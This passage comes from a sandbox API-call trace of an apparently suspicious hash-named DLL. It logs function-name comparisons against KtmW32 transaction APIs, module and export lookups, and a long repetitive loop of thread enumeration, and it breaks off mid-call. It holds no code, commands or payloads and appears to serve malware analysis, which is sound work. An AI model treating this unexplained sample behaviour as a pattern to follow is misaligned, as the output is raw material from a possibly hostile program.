(lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0243.096] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0243.096] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0243.096] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0243.096] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0243.096] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0243.096] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0243.096] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0243.096] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0243.096] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0243.096] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0243.096] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0243.096] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0243.096] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0243.096] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0243.096] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0243.096] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0243.096] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0243.096] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0243.096] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0243.096] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0243.096] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0243.096] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0243.098] GetProcessHeap () returned 0x550000 [0243.098] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2d65030 | out: hHeap=0x550000) returned 1 [0243.110] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0243.110] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0243.111] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1000) returned 0x2d65030 [0243.113] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x3c) returned 0x5605a0 [0243.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="opj_encoder_set_extra_options", cchWideChar=-1, lpMultiByteStr=0x5605a0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opj_encoder_set_extra_options", lpUsedDefaultChar=0x0) returned 30 [0243.113] GetLastError () returned 0x0 [0243.114] SetLastError (dwErrCode=0x0) [0243.114] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_encoder_set_extra_optionsW") returned 0x0 [0243.114] GetLastError () returned 0x7f [0243.114] SetLastError (dwErrCode=0x7f) [0243.114] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_encoder_set_extra_optionsA") returned 0x0 [0243.114] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_encoder_set_extra_options") returned 0x7ffc45f1a600 [0243.114] GetActiveWindow () returned 0x0 [0243.114] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2d65030 | out: hHeap=0x550000) returned 1 [0243.114] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5605a0 | out: hHeap=0x550000) returned 1 [0243.114] GetCurrentProcessId () returned 0x1010 [0243.114] GetCurrentThreadId () returned 0x1024 [0243.114] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0243.322] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.324] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.326] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.330] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.331] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.331] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.332] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.335] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.336] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.577] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.580] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.584] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.584] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.586] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.589] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.717] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.742] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.745] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.745] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.748] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.749] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.750] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.750] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.751] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.752] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.753] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.904] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.904] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.905] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.924] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.929] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.932] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0243.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.119] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.119] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.120] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.121] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.122] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.122] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.123] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.124] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.124] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.131] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.131] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.143] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.301] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.303] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.303] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.304] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.304] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.306] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.310] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.311] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.311] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.312] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.312] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.313] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.313] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.314] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.314] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.315] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.316] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.316] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.317] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.317] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.318] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.318] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.319] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.319] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.320] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.321] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.321] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.322] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.322] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.323] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.323] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.324] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.326] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.326] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.327] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.327] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.328] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.329] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.329] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.496] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.497] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.498] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.499] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.499] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.500] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.501] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.501] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.502] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.503] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.503] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.504] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.504] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.505] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.506] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.506] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.507] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.507] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.508] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.508] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.509] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.512] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.512] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.513] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.513] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.514] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.514] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.515] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.515] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.516] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.517] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.517] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.518] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.518] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.519] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.519] Thread32Next 